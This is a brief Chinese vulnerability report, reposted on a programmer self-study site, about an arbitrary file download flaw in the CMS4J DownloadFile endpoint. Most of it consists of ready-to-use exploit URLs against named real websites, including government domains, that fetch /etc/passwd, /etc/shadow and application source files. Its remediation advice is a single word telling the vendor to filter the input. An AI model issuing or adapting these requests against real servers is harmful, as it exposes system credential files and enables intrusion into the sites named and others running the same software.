CMS4J文件下载未对路径进行过滤,可以下载任意文件 详细说明: http://www.kunlunhealth.com/DownloadFile?type=full&file=/etc/passwd 涉及部分gov网站。。 漏洞 证明: http://www.nndj.gov.cn/DownloadFile?type=full&file=/etc/shadow http://www.hfjjzd.gov.cn:8080/DownloadFile?type=full&file=/index. jsp 修复方案: 过滤吧 作者 zmx
查看更多关于CMS4J任意文件下载漏洞及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12241